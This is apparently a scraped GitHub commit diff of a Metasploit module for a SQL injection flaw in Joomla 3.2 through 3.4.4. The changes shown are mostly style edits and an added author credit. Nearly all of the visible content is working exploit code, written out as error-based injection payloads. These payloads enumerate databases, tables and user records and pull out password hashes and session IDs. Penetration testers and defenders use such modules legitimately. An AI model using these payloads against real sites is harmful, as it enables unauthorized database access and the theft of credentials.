You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This module exploits a SQL injection vulnerability in Joomla versions 3.2 through 3.4.4
18
-
in order to either enumerate usernames and password hashes or session IDs.
17
+
This module exploits a SQL injection vulnerability in Joomla versions 3.2
18
+
through 3.4.4 in order to either enumerate usernames and password hashes
19
+
or session IDs.
19
20
},
20
21
'References'=>
21
22
[
@@ -24,109 +25,183 @@ def initialize(info = {})
24
25
],
25
26
'Author'=>
26
27
[
27
-
'Asaf Orpani',#discovery
28
-
'bperry'#metasploit module
28
+
'Asaf Orpani',# discovery
29
+
'bperry',# metasploit module
30
+
'Nixawk'# module review
29
31
],
30
32
'License'=>MSF_LICENSE,
31
-
'DisclosureDate'=>"Oct 22 2015"
33
+
'DisclosureDate'=>'Oct 22 2015'
32
34
))
33
35
34
36
register_options(
35
37
[
36
-
OptString.new("TARGETURI",[true,'The relative URI of the Joomla instance','/'])
38
+
OptString.new('TARGETURI',[true,'The relative URI of the Joomla instance','/'])
37
39
],self.class)
38
40
end
39
41
40
42
defcheck
41
43
flag=Rex::Text.rand_text_alpha(8)
42
-
left_marker=Rex::Text.rand_text_alpha(5)
43
-
right_marker=Rex::Text.rand_text_alpha(5)
44
+
lmark=Rex::Text.rand_text_alpha(5)
45
+
rmark=Rex::Text.rand_text_alpha(5)
44
46
45
-
payload="AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT 0x#{flag.unpack("H*")[0]}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
db_count="AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
db="AND (SELECT 2255 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
table_count="AND (SELECT 8640 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]})),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
table="AND (SELECT 2474 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]}) LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
user_count="AND (SELECT 3737 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{db}.#{table}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
get_col="AND (SELECT 7072 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),#{k},54) FROM #{db}.#{table} ORDER BY id LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
0 commit comments